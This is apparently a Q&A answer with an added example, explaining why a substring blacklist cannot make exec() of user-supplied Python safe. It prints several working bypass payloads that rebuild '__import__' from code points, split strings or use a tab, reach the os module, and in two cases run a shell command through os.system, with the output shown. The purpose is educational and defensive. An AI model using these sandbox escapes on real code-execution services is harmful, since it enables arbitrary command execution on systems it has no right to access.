<p>No, this is not safe, and it never truly will be. See this quick demo:</p>
<pre><code>def validateUserCode(user_code):
    # Substring blacklist: reject the code if any of these strings appear in it.
    unsupported_commands = ['import ','print(', 'with ', '.close(', '.read(', '.readline(', 'open(']
    for command in unsupported_commands:
        if command in user_code:
            raise ValueError(command)

# Build the string "__import__" from code points so the word "import" never
# appears in the source, then use it to fetch os and run a shell command.
user_code = """
imp = __builtins__.__dict__[f"__{''.join(map(chr,(105,109,112,111,114,116)))}__"]
os = imp("os")
os.system("ls /")
"""
validateUserCode(user_code)  # passes: none of the blacklisted substrings are present
exec(user_code)
</code></pre>
<blockquote>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Applications Users cores home sbin var
Library Volumes dev opt tmp
System bin etc private usr
</code></pre>
</blockquote>
<p>Or, if you prefer, a more obfuscated one:</p>
<pre><code>def validateUserCode(user_code):
    # Substring blacklist: reject the code if any of these strings appear in it.
    unsupported_commands = ['import ','print(', 'with ', '.close(', '.read(', '.readline(', 'open(']
    for command in unsupported_commands:
        if command in user_code:
            raise ValueError(command)

# f() turns code points into a dunder name: f(100,105,99,116) -> "__dict__".
# The three calls below build "__builtins__", "__dict__" and "__import__".
user_code = """
f=lambda*a,l=(95,)*2:''.join(map(chr,(*l,*a,*l)))
imp = getattr(globals()[f(98,117,105,108,116,105,110,115)],f(100,105,99,116))[f(105,109,112,111,114,116)]
os = imp("os")
os.system("ls /")
"""
validateUserCode(user_code)  # passes: none of the blacklisted substrings are present
exec(user_code)
</code></pre>
<blockquote>
<p>Output:</p>
<pre class="lang-none prettyprint-override"><code>Applications Users cores home sbin var
Library Volumes dev opt tmp
System bin etc private usr
</code></pre>
</blockquote>
<p>Also: the fact that you are trying to blacklist <code>'print('</code>, which still leaves <code>print ("foo")</code> 100% usable, shows that you shouldn't bother trying to implement this.</p>
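<p>An added example, not part of the answer above, that generalises its two bypasses: the same substring blacklist is run against several constructed payloads, each of which avoids every listed string and still obtains the <code>os</code> module. The payloads bind the module to a name called <code>result</code> instead of running <code>ls /</code>, so the escape can be checked without side effects, and execution is given the <code>builtins</code> module explicitly, matching a script run as <code>__main__</code> where the answer's <code>__builtins__.__dict__</code> lookup works. The function and payload names are my own.</p>

```python
import builtins

# The same substring blacklist used in the answer above.
BLACKLIST = ['import ', 'print(', 'with ', '.close(', '.read(', '.readline(', 'open(']


def validate_user_code(user_code):
    """Reject user_code if it contains any blacklisted substring."""
    for command in BLACKLIST:
        if command in user_code:
            raise ValueError(command)


def blacklist_accepts(user_code):
    """True when the blacklist lets user_code through unchanged."""
    try:
        validate_user_code(user_code)
    except ValueError:
        return False
    return True


# Constructed payloads (assumed for this example, not from the original post).
# Each one contains none of the blacklisted substrings and, when executed,
# binds the os module to the name `result`.
PAYLOADS = {
    # The answer's trick: spell "__import__" from code points.
    "chr_join": """imp = __builtins__.__dict__[f"__{''.join(map(chr,(105,109,112,111,114,116)))}__"]
result = imp('os')
""",
    # Split the string so 'import ' (with its trailing space) never appears.
    "concat": "result = vars(__builtins__)['__imp' + 'ort__']('os')\n",
    # No obfuscation needed at all: '__import__(' does not contain 'import '.
    "dunder": "result = __import__('os')\n",
    # A tab after the keyword is valid Python and defeats 'import ' too.
    "tab": "import\tos\nresult = os\n",
}


def run_payload(name):
    """Pass one payload through the blacklist, execute it, and return the
    __name__ of the module it obtained."""
    code = PAYLOADS[name]
    validate_user_code(code)  # raises ValueError if the blacklist catches it
    # Execute with the builtins *module* as __builtins__, as in __main__.
    g = {"__builtins__": builtins}
    exec(code, g)
    return g["result"].__name__


def demonstrate():
    """Map each payload name to the module it reached; every value is 'os'."""
    return {name: run_payload(name) for name in PAYLOADS}


if __name__ == "__main__":
    for name, module in demonstrate().items():
        print(f"{name:10s} -> obtained module {module!r}")
    # The print() point from the answer: a space defeats the 'print(' entry.
    print("print ('foo') accepted:", blacklist_accepts("print ('foo')"))
```

Every entry of <code>demonstrate()</code> comes back as <code>'os'</code>, and <code>blacklist_accepts("print ('foo')")</code> is true while <code>blacklist_accepts("print('foo')")</code> is false, which is the whole problem with matching on substrings: the attacker controls the spelling, the validator does not.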